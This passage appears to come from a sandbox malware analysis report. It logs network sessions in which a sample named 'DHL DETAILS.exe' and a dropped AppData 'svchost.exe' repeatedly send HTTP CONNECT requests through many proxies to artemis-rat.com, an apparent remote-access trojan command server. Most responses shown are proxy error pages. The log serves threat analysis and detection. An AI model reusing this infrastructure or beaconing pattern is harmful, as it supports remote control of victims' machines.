                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.655314922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    1802192.168.2.555277185.101.16.5280
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.683476925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1803192.168.2.55401551.222.241.157462866352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.695583105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.380075932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1804192.168.2.553833175.183.82.22181976352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.697073936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.797631025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.864722013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.974284887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1805192.168.2.55527443.231.22.228806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.707400084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1806192.168.2.55503174.119.147.20941456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.708637953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    1807192.168.2.555280103.118.46.1778080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.736243963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1808192.168.2.551810166.62.38.100561916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.757920980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    1809192.168.2.555282201.13.147.1615678
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.773822069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    1810192.168.2.55528161.178.152.317302
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.776873112 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:22.136538982 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1811192.168.2.555328104.16.104.128043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.425333977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.581192017 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:27 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1812192.168.2.555333104.25.167.888043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.453824043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.610743999 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:27 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1813192.168.2.555357172.67.181.208043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.481059074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.635349989 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:27 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1814192.168.2.55532294.131.63.1205837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.483438969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.703952074 CET1260INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/6.0.0-20220501-re899e0c27
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:27 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3670
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Cache-Status: ezproxies.com
                                                                                    Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1815192.168.2.555362185.162.228.1548043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.484935999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.639235973 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:27 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1816192.168.2.555369104.25.64.278043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.498620033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.653151035 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:27 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1817192.168.2.555380104.22.50.2208043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.514285088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.668457031 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:27 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1818192.168.2.555366184.170.248.5414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.572017908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1819192.168.2.555412154.208.10.1268043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.583340883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.744266033 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.23.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:27 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1820192.168.2.555370184.170.245.148414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.584147930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1821192.168.2.55537850.63.12.101295343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.598526001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1822192.168.2.555309119.3.215.41888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.601994038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1823192.168.2.55537924.249.199.12414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.615999937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1824192.168.2.555457172.67.38.968043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.631536007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.785902023 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:27 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
